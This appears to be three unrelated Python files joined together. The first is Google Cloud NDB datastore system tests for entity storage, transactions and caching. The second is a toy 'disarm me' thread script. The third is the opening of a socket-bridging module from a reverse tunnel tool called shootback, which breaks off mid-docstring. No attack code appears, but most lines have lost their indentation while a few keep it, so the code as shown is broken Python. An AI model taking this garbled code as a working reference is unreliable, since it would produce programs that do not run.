def test_retrieve_entity_with_redis_cache(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
global_cache = global_cache_module.RedisCache.from_environment()
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
cache_key = _cache.global_cache_key(key._key)
assert global_cache.redis.get(cache_key) is not None
        patch = mock.patch(
            "google.cloud.ndb._datastore_api._LookupBatch.add",
            side_effect=Exception("Shouldn't call this"),
        )
with patch:
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_not_found(ds_entity):
entity_id = test_utils.system.unique_resource_id()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_nested_tasklet(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
@ndb.tasklet
def get_foo(key):
entity = yield key.get_async()
raise ndb.Return(entity.foo)
key = ndb.Key(KIND, entity_id)
assert get_foo(key).result() == 42
@pytest.mark.usefixtures("client_context")
def test_retrieve_two_entities_in_parallel(ds_entity):
entity1_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity1_id, foo=42, bar="none")
entity2_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity2_id, foo=65, bar="naan")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key1 = ndb.Key(KIND, entity1_id)
key2 = ndb.Key(KIND, entity2_id)
@ndb.tasklet
def get_two_entities():
entity1, entity2 = yield key1.get_async(), key2.get_async()
raise ndb.Return(entity1, entity2)
entity1, entity2 = get_two_entities().result()
assert isinstance(entity1, SomeKind)
assert entity1.foo == 42
assert entity1.bar == "none"
assert isinstance(entity2, SomeKind)
assert entity2.foo == 65
assert entity2.bar == "naan"
@pytest.mark.usefixtures("client_context")
def test_insert_entity(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
# Make sure strings are stored as strings in datastore
ds_entity = ds_client.get(key._key)
assert ds_entity["bar"] == "none"
@pytest.mark.usefixtures("client_context")
def test_insert_entity_with_stored_name_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.StringProperty()
bar = ndb.StringProperty(name="notbar")
entity = SomeKind(foo="something", bar="or other")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == "something"
assert retrieved.bar == "or other"
ds_entity = ds_client.get(key._key)
assert ds_entity["notbar"] == "or other"
@pytest.mark.usefixtures("client_context")
def test_insert_roundtrip_naive_datetime(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.DateTimeProperty()
entity = SomeKind(foo=datetime.datetime(2010, 5, 12, 2, 42))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == datetime.datetime(2010, 5, 12, 2, 42)
@pytest.mark.usefixtures("client_context")
def test_datetime_w_tzinfo(dispose_of, ds_client):
class timezone(datetime.tzinfo):
def __init__(self, offset):
self.offset = datetime.timedelta(hours=offset)
def utcoffset(self, dt):
return self.offset
def dst(self, dt):
return datetime.timedelta(0)
mytz = timezone(-4)
class SomeKind(ndb.Model):
foo = ndb.DateTimeProperty(tzinfo=mytz)
bar = ndb.DateTimeProperty(tzinfo=mytz)
entity = SomeKind(
foo=datetime.datetime(2010, 5, 12, 2, 42, tzinfo=timezone(-5)),
bar=datetime.datetime(2010, 5, 12, 2, 42),
)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == datetime.datetime(2010, 5, 12, 3, 42, tzinfo=mytz)
assert retrieved.bar == datetime.datetime(2010, 5, 11, 22, 42, tzinfo=mytz)
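    # Both stored values name the same instants: 02:42 at UTC-5 is 07:42 UTC,
    # i.e. 03:42 at UTC-4; the naive 2010-05-12 02:42 is treated as UTC, i.e.
    # 2010-05-11 22:42 at UTC-4.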
def test_parallel_threads(dispose_of, namespace):
client = ndb.Client(namespace=namespace)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
def insert(foo):
with client.context(cache_policy=False):
entity = SomeKind(foo=foo, bar="none")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
assert retrieved.bar == "none"
thread1 = threading.Thread(target=insert, args=[42], name="one")
thread2 = threading.Thread(target=insert, args=[144], name="two")
thread1.start()
thread2.start()
thread1.join()
thread2.join()
@pytest.mark.usefixtures("client_context")
def test_large_json_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.JsonProperty()
foo = {str(i): i for i in range(500)}
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_compressed_json_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.JsonProperty(compressed=True)
foo = {str(i): i for i in range(500)}
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_compressed_blob_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.BlobProperty(compressed=True)
foo = b"abc" * 100
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_with_legacy_compressed_property(
ds_entity_with_meanings,
):
class SomeKind(ndb.Model):
blob = ndb.BlobProperty()
value = b"abc" * 1000
compressed_value = zlib.compress(value)
entity_id = test_utils.system.unique_resource_id()
ds_entity_with_meanings(
{"blob": (22, compressed_value)},
KIND,
entity_id,
**{"blob": compressed_value}
)
key = ndb.Key(KIND, entity_id)
retrieved = key.get()
assert retrieved.blob == value
@pytest.mark.usefixtures("client_context")
def test_large_pickle_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.PickleProperty()
foo = {str(i): i for i in range(500)}
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_key_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.KeyProperty()
key_value = ndb.Key("Whatevs", 123)
entity = SomeKind(foo=key_value)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == key_value
@pytest.mark.usefixtures("client_context")
def test_multiple_key_properties(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.KeyProperty(kind="Whatevs")
bar = ndb.KeyProperty(kind="Whatevs")
foo = ndb.Key("Whatevs", 123)
bar = ndb.Key("Whatevs", 321)
entity = SomeKind(foo=foo, bar=bar)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
assert retrieved.bar == bar
assert retrieved.foo != retrieved.bar
def test_insert_entity_with_caching(client_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
client_context.set_cache_policy(None) # Use default
entity = SomeKind(foo=42, bar="none")
key = entity.put()
with client_context.new(cache_policy=False).use():
        # Sneaky. Delete entity out from under cache so we know we're getting
        # the cached copy.
key.delete()
eventually(key.get, _equals(None))
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
def test_insert_entity_with_global_cache(dispose_of, client_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
global_cache = global_cache_module._InProcessGlobalCache()
cache_dict = global_cache_module._InProcessGlobalCache.cache
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
cache_key = _cache.global_cache_key(key._key)
assert not cache_dict
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
assert cache_key in cache_dict
entity.foo = 43
entity.put()
# This is py27 behavior. I can see a case being made for caching the
# entity on write rather than waiting for a subsequent lookup.
assert cache_key not in cache_dict
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
def test_insert_entity_with_redis_cache(dispose_of, client_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
global_cache = global_cache_module.RedisCache.from_environment()
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
cache_key = _cache.global_cache_key(key._key)
assert global_cache.redis.get(cache_key) is None
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
assert global_cache.redis.get(cache_key) is not None
entity.foo = 43
entity.put()
# This is py27 behavior. I can see a case being made for caching the
# entity on write rather than waiting for a subsequent lookup.
assert global_cache.redis.get(cache_key) is None
@pytest.mark.usefixtures("client_context")
def test_update_entity(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
entity = key.get()
entity.foo = 56
entity.bar = "high"
assert entity.put() == key
retrieved = key.get()
assert retrieved.foo == 56
assert retrieved.bar == "high"
@pytest.mark.usefixtures("client_context")
def test_insert_entity_in_transaction(dispose_of):
commit_callback = mock.Mock()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
def save_entity():
ndb.get_context().call_on_commit(commit_callback)
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
return key
key = ndb.transaction(save_entity)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
commit_callback.assert_called_once_with()
@pytest.mark.usefixtures("client_context")
def test_update_entity_in_transaction(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
def update_entity():
key = ndb.Key(KIND, entity_id)
entity = key.get()
entity.foo = 56
entity.bar = "high"
assert entity.put() == key
return key
key = ndb.transaction(update_entity)
retrieved = key.get()
assert retrieved.foo == 56
assert retrieved.bar == "high"
@pytest.mark.usefixtures("client_context")
def test_parallel_transactions():
def task(delay):
@ndb.tasklet
def callback():
transaction = ndb.get_context().transaction
yield ndb.sleep(delay)
assert ndb.get_context().transaction == transaction
raise ndb.Return(transaction)
return callback
future1 = ndb.transaction_async(task(0.1))
future2 = ndb.transaction_async(task(0.06))
ndb.wait_all((future1, future2))
assert future1.get_result() != future2.get_result()
@pytest.mark.usefixtures("client_context")
def test_delete_entity(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
assert key.delete() is None
assert key.get() is None
assert key.delete() is None
def test_delete_entity_with_caching(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
client_context.set_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
assert key.delete() is None
assert key.get() is None
assert key.delete() is None
def test_delete_entity_with_global_cache(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
cache_key = _cache.global_cache_key(key._key)
global_cache = global_cache_module._InProcessGlobalCache()
cache_dict = global_cache_module._InProcessGlobalCache.cache
with client_context.new(global_cache=global_cache).use():
assert key.get().foo == 42
assert cache_key in cache_dict
assert key.delete() is None
assert cache_key not in cache_dict
# This is py27 behavior. Not entirely sold on leaving _LOCKED value for
# Datastore misses.
assert key.get() is None
assert cache_dict[cache_key][0] == b"0"
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
def test_delete_entity_with_redis_cache(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
cache_key = _cache.global_cache_key(key._key)
global_cache = global_cache_module.RedisCache.from_environment()
with client_context.new(global_cache=global_cache).use():
assert key.get().foo == 42
assert global_cache.redis.get(cache_key) is not None
assert key.delete() is None
assert global_cache.redis.get(cache_key) is None
# This is py27 behavior. Not entirely sold on leaving _LOCKED value for
# Datastore misses.
assert key.get() is None
assert global_cache.redis.get(cache_key) == b"0"
@pytest.mark.usefixtures("client_context")
def test_delete_entity_in_transaction(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
def delete_entity():
assert key.delete() is None
assert key.get().foo == 42 # not deleted until commit
ndb.transaction(delete_entity)
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_delete_entity_in_transaction_then_rollback(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
def delete_entity():
assert key.delete() is None
raise Exception("Spurious error")
with pytest.raises(Exception):
ndb.transaction(delete_entity)
assert key.get().foo == 42
@pytest.mark.usefixtures("client_context")
def test_allocate_ids():
class SomeKind(ndb.Model):
pass
keys = SomeKind.allocate_ids(5)
assert len(keys) == 5
for key in keys:
assert key.id()
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_get_by_id(ds_entity):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
entity = SomeKind.get_by_id(entity_id)
assert entity.foo == 42
@pytest.mark.usefixtures("client_context")
def test_get_or_insert_get(ds_entity):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
name = "Inigo Montoya"
assert SomeKind.get_by_id(name) is None
ds_entity(KIND, name, foo=42)
entity = SomeKind.get_or_insert(name, foo=21)
assert entity.foo == 42
@pytest.mark.usefixtures("client_context")
def test_get_or_insert_insert(dispose_of):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
name = "Inigo Montoya"
assert SomeKind.get_by_id(name) is None
entity = SomeKind.get_or_insert(name, foo=21)
dispose_of(entity._key._key)
assert entity.foo == 21
@pytest.mark.usefixtures("client_context")
def test_get_or_insert_get_in_transaction(ds_entity):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
name = "Inigo Montoya"
assert SomeKind.get_by_id(name) is None
def do_the_thing():
ds_entity(KIND, name, foo=42)
return SomeKind.get_or_insert(name, foo=21)
entity = ndb.transaction(do_the_thing)
assert entity.foo == 42
@pytest.mark.usefixtures("client_context")
def test_insert_entity_with_structured_property(dispose_of):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind)
entity = SomeKind(foo=42, bar=OtherKind(one="hi", two="mom"))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar.one == "hi"
assert retrieved.bar.two == "mom"
assert isinstance(retrieved.bar, OtherKind)
def test_insert_entity_with_structured_property_legacy_data(
client_context, dispose_of, ds_client
):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind)
with client_context.new(legacy_data=True).use():
entity = SomeKind(foo=42, bar=OtherKind(one="hi", two="mom"))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar.one == "hi"
assert retrieved.bar.two == "mom"
assert isinstance(retrieved.bar, OtherKind)
ds_entity = ds_client.get(key._key)
assert ds_entity["foo"] == 42
assert ds_entity["bar.one"] == "hi"
assert ds_entity["bar.two"] == "mom"
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_with_legacy_structured_property(ds_entity):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind)
entity_id = test_utils.system.unique_resource_id()
ds_entity(
KIND, entity_id, **{"foo": 42, "bar.one": "hi", "bar.two": "mom"}
)
key = ndb.Key(KIND, entity_id)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar.one == "hi"
assert retrieved.bar.two == "mom"
assert isinstance(retrieved.bar, OtherKind)
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_with_legacy_repeated_structured_property(ds_entity):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind, repeated=True)
entity_id = test_utils.system.unique_resource_id()
ds_entity(
KIND,
entity_id,
**{"foo": 42, "bar.one": ["hi", "hello"], "bar.two": ["mom", "dad"]}
)
key = ndb.Key(KIND, entity_id)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar[0].one == "hi"
assert retrieved.bar[0].two == "mom"
assert retrieved.bar[1].one == "hello"
assert retrieved.bar[1].two == "dad"
assert isinstance(retrieved.bar[0], OtherKind)
assert isinstance(retrieved.bar[1], OtherKind)
@pytest.mark.usefixtures("client_context")
def test_insert_expando(dispose_of):
class SomeKind(ndb.Expando):
foo = ndb.IntegerProperty()
entity = SomeKind(foo=42)
entity.expando_prop = "exp-value"
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.expando_prop == "exp-value"
@pytest.mark.usefixtures("client_context")
def test_insert_polymodel(dispose_of):
class Animal(ndb.PolyModel):
one = ndb.StringProperty()
class Feline(Animal):
two = ndb.StringProperty()
class Cat(Feline):
three = ndb.StringProperty()
entity = Cat(one="hello", two="dad", three="i'm in jail")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved, Animal)
assert isinstance(retrieved, Cat)
assert retrieved.one == "hello"
assert retrieved.two == "dad"
assert retrieved.three == "i'm in jail"
@pytest.mark.usefixtures("client_context")
def test_insert_autonow_property(dispose_of):
class SomeKind(ndb.Model):
foo = ndb.StringProperty()
created_at = ndb.DateTimeProperty(indexed=True, auto_now_add=True)
updated_at = ndb.DateTimeProperty(indexed=True, auto_now=True)
entity = SomeKind(foo="bar")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved.created_at, datetime.datetime)
assert isinstance(retrieved.updated_at, datetime.datetime)
@pytest.mark.usefixtures("client_context")
def test_insert_nested_autonow_property(dispose_of):
class OtherKind(ndb.Model):
created_at = ndb.DateTimeProperty(indexed=True, auto_now_add=True)
updated_at = ndb.DateTimeProperty(indexed=True, auto_now=True)
class SomeKind(ndb.Model):
other = ndb.StructuredProperty(OtherKind)
entity = SomeKind(other=OtherKind())
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved.other.created_at, datetime.datetime)
assert isinstance(retrieved.other.updated_at, datetime.datetime)
@pytest.mark.usefixtures("client_context")
def test_uninitialized_property(dispose_of):
class SomeKind(ndb.Model):
foo = ndb.StringProperty(required=True)
entity = SomeKind()
with pytest.raises(ndb.exceptions.BadValueError):
entity.put()
@mock.patch(
"google.cloud.ndb._datastore_api.make_call",
mock.Mock(side_effect=Exception("Datastore shouldn't get called.")),
)
def test_crud_without_datastore(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
global_cache = global_cache_module._InProcessGlobalCache()
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
context.set_datastore_policy(False) # Don't use Datastore
key = ndb.Key(KIND, entity_id)
SomeKind(foo=42, bar="none", baz="night", _key=key).put()
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
key.delete()
assert key.get() is None
|
thread_ex.py
|
import threading
import time
import sys
def background():
    while True:
        time.sleep(3)
        print('disarm me by typing disarm')
def other_function():
    print('You disarmed me! Dying now.')
# threading1 runs in the background regardless of user input;
# daemon=True lets the program exit without waiting for this thread
threading1 = threading.Thread(target=background)
threading1.daemon = True
threading1.start()
while True:
    if input() == 'disarm':
        other_function()
        sys.exit()
    else:
        print('not disarmed')
|
common_func.py
|
#!/usr/bin/env python
# coding=utf-8
from __future__ import print_function, unicode_literals, division, absolute_import
import sys
import time
import binascii
import struct
import collections
import logging
import socket
import functools
import threading
import traceback
import warnings
try:
import selectors
from selectors import EVENT_READ, EVENT_WRITE
EVENT_READ_WRITE = EVENT_READ | EVENT_WRITE
except ImportError:
import select
warnings.warn('selectors module not available, fallback to select')
selectors = None
try:
import ssl
except ImportError:
ssl = None
warnings.warn('ssl module not available, ssl feature is disabled')
try:
# for pycharm type hinting
from typing import Union, Callable
except:
pass
# socket recv buffer, 16384 bytes
RECV_BUFFER_SIZE = 2 ** 14
# default secretkey, use -k/--secretkey to change
SECRET_KEY = None # "shootback"
# how long a SPARE slaver connection is kept alive
# once a slaver receives a heart-beat package from the master,
# the TTL is reset. The heart-beat interval is shorter than the TTL,
# so, theoretically, a spare slaver never times out,
# except on network failure
# notice: a working slaver would NEVER time out
SPARE_SLAVER_TTL = 300
# internal program version, appears in CtrlPkg
INTERNAL_VERSION = 0x0013
# # how many packet are buffed, before delaying recv
# SOCKET_BRIDGE_SEND_BUFF_SIZE = 5
# version for human readable
__version__ = (2, 6, 1, INTERNAL_VERSION)
# just a logger
log = logging.getLogger(__name__)
def version_info():
"""get program version for human. eg: "2.1.0-r2" """
return "{}.{}.{}-r{}".format(*__version__)
def configure_logging(level):
logging.basicConfig(
level=level,
format='[%(levelname)s %(asctime)s] %(message)s',
)
def fmt_addr(socket):
"""(host, int(port)) --> "host:port" """
return "{}:{}".format(*socket)
def split_host(x):
""" "host:port" --> (host, int(port))"""
try:
host, port = x.split(":")
port = int(port)
except:
raise ValueError(
"wrong syntax, format host:port is "
"required, not {}".format(x))
else:
return host, port
def try_close(closable):
"""try close something
same as
try:
connection.close()
except:
pass
"""
try:
closable.close()
except:
pass
def select_recv(conn, buff_size, timeout=None):
"""add timeout for socket.recv()
:type conn: socket.socket
:type buff_size: int
:type timeout: float
:rtype: Union[bytes, None]
"""
if selectors:
sel = selectors.DefaultSelector()
sel.register(conn, EVENT_READ)
events = sel.select(timeout)
sel.close()
if not events:
# timeout
raise RuntimeError("recv timeout")
else:
rlist, _, _ = select.select([conn], [], [], timeout)
buff = conn.recv(buff_size)
if not buff:
raise RuntimeError("received zero bytes, socket was closed")
return buff
def set_secretkey(key):
global SECRET_KEY
SECRET_KEY = key
CtrlPkg.recalc_crc32()
class SocketBridge(object):
"""
transfer data between sockets
"""
def __init__(self):
self.conn_rd = set() # record readable-sockets
self.conn_wr = set() # record writeable-sockets
self.map = {} # record sockets pairs
self.callbacks = {} # record callbacks
self.send_buff = {} # buff one packet for those sending too-fast socket
if selectors:
self.sel = selectors.DefaultSelector()
else:
self.sel = None
def add_conn_pair(self, conn1, conn2, callback=None):
"""
transfer anything between two sockets
:type conn1: socket.socket
:type conn2: socket.socket
:param callback: callback in connection finish
:type callback: Callable
"""
# change to non-blocking
# we use select or epoll to notice when data is ready
conn1.setblocking(False)
conn2.setblocking(False)
# mark as readable+writable
self.conn_rd.add(conn1)
self.conn_wr.add(conn1)
self.conn_rd.add(conn2)
self.conn_wr.add(conn2)
# record sockets pairs
self.map[conn1] = conn2
self.map[conn2] = conn1
# record callback
if callback is not None:
self.callbacks[conn1] = callback
if self.sel:
self.sel.register(conn1, EVENT_READ_WRITE)
self.sel.register(conn2, EVENT_READ_WRITE)
def start_as_daemon(self):
t = threading.Thread(target=self.start)
t.daemon = True
t.start()
log.info("SocketBridge daemon started")
return t
def start(self):
while True:
try:
self._start()
except:
log.error("FATAL ERROR! SocketBridge failed {}".format(
traceback.format_exc()
))
def _start(self):
while True:
if not self.conn_rd and not self.conn_wr:
# sleep if there is no connections
time.sleep(0.01)
continue
# blocks until there is socket(s) ready for .recv
# notice: sockets which were closed by remote,
# are also regarded as read-ready by select()
if self.sel:
events = self.sel.select(0.5)
socks_rd = tuple(key.fileobj for key, mask in events if mask & EVENT_READ)
socks_wr = tuple(key.fileobj for key, mask in events if mask & EVENT_WRITE)
else:
r, w, _ = select.select(self.conn_rd, self.conn_wr, [], 0.5)
socks_rd = tuple(r)
socks_wr = tuple(w)
# log.debug('socks_rd: %s, socks_wr:%s', len(socks_rd), len(socks_wr))
if not socks_rd and not self.send_buff: # reduce CPU in low traffic
time.sleep(0.005)
# log.debug('got rd:%s wr:%s', socks_rd, socks_wr)
# ----------------- RECEIVING ----------------
            # To prevent high CPU usage in slow network environments, we record whether any
            # network operation succeeded; if nothing happened in this loop pass, we sleep briefly.
_stuck_network = True
for s in socks_rd: # type: socket.socket
# if this socket has non-sent data, stop recving more, to prevent buff blowing up.
if self.map[s] in self.send_buff:
# log.debug('delay recv because another too slow %s', self.map.get(s))
continue
_stuck_network = False
try:
received = s.recv(RECV_BUFFER_SIZE)
# log.debug('recved %s from %s', len(received), s)
except Exception as e:
# ssl may raise SSLWantReadError or SSLWantWriteError
# just continue and wait it complete
if ssl and isinstance(e, (ssl.SSLWantReadError, ssl.SSLWantWriteError)):
# log.warning('got %s, wait to read then', repr(e))
continue
# unable to read, in most cases, it's due to socket close
log.warning('error reading socket %s, %s closing', repr(e), s)
self._rd_shutdown(s)
continue
if not received:
self._rd_shutdown(s)
continue
else:
self.send_buff[self.map[s]] = received
# ----------------- SENDING ----------------
for s in socks_wr:
if s not in self.send_buff:
if self.map.get(s) not in self.conn_rd:
self._wr_shutdown(s)
continue
_stuck_network = False
data = self.send_buff.pop(s)
try:
s.send(data)
# log.debug('sent %s to %s', len(data), s)
except Exception as e:
if ssl and isinstance(e, (ssl.SSLWantReadError, ssl.SSLWantWriteError)):
# log.warning('got %s, wait to write then', repr(e))
self.send_buff[s] = data # write back for next write
continue
# unable to send, close connection
log.warning('error sending socket %s, %s closing', repr(e), s)
self._wr_shutdown(s)
continue
if _stuck_network: # slower at bad network
time.sleep(0.001)
def _sel_disable_event(self, conn, ev):
try:
_key = self.sel.get_key(conn) # type:selectors.SelectorKey
except KeyError:
pass
else:
if _key.events == EVENT_READ_WRITE:
self.sel.modify(conn, EVENT_READ_WRITE ^ ev)
else:
self.sel.unregister(conn)
def _rd_shutdown(self, conn, once=False):
"""action when connection should be read-shutdown
:type conn: socket.socket
"""
if conn in self.conn_rd:
self.conn_rd.remove(conn)
if self.sel:
self._sel_disable_event(conn, EVENT_READ)
# if conn in self.send_buff:
# del self.send_buff[conn]
try:
conn.shutdown(socket.SHUT_RD)
except:
pass
if not once and conn in self.map: # use the `once` param to avoid infinite loop
            # if a socket is rd_shutdowned, then its
            # pair should be wr_shutdown.
self._wr_shutdown(self.map[conn], True)
if self.map.get(conn) not in self.conn_rd:
# if both two connection pair was rd-shutdowned,
# this pair sockets are regarded to be completed
# so we gonna close them
self._terminate(conn)
def _wr_shutdown(self, conn, once=False):
"""action when connection should be write-shutdown
:type conn: socket.socket
"""
try:
conn.shutdown(socket.SHUT_WR)
except:
pass
if conn in self.conn_wr:
self.conn_wr.remove(conn)
if self.sel:
self._sel_disable_event(conn, EVENT_WRITE)
if not once and conn in self.map: # use the `once` param to avoid infinite loop
            # if a socket is wr_shutdowned, then its
            # pair should be rd_shutdown.
self._rd_shutdown(self.map[conn], True)
def _terminate(self, conn, once=False):
"""terminate a sockets pair (two socket)
:type conn: socket.socket
:param conn: any one of the sockets pair
"""
try_close(conn) # close the first socket
# ------ close and clean the mapped socket, if exist ------
_another_conn = self.map.pop(conn, None)
self.send_buff.pop(conn, None)
if self.sel:
try:
self.sel.unregister(conn)
except:
pass
# ------ callback --------
# because we are not sure which socket are assigned to callback,
# so we should try both
if conn in self.callbacks:
try:
self.callbacks[conn]()
except Exception as e:
log.error("traceback error: {}".format(e))
log.debug(traceback.format_exc())
del self.callbacks[conn]
# terminate another
if not once and _another_conn in self.map:
self._terminate(_another_conn)
class CtrlPkg(object):
"""
    Control packages of shootback; not complete yet.
    Currently we have: handshake and heartbeat.
    (project: http://github.com/aploium)

    Package structure, 64 bytes in total (CtrlPkg.FORMAT_PKG), big-endian:

        size  name      data type       description
        1     pkg_ver   unsigned char   package version *1
        1     pkg_type  signed char     package type *2
        2     prgm_ver  unsigned short  program version *3
        20    N/A       N/A             reserved
        40    data      bytes           data area *4

    *1: package version: version of the overall package layout, currently only 0x01
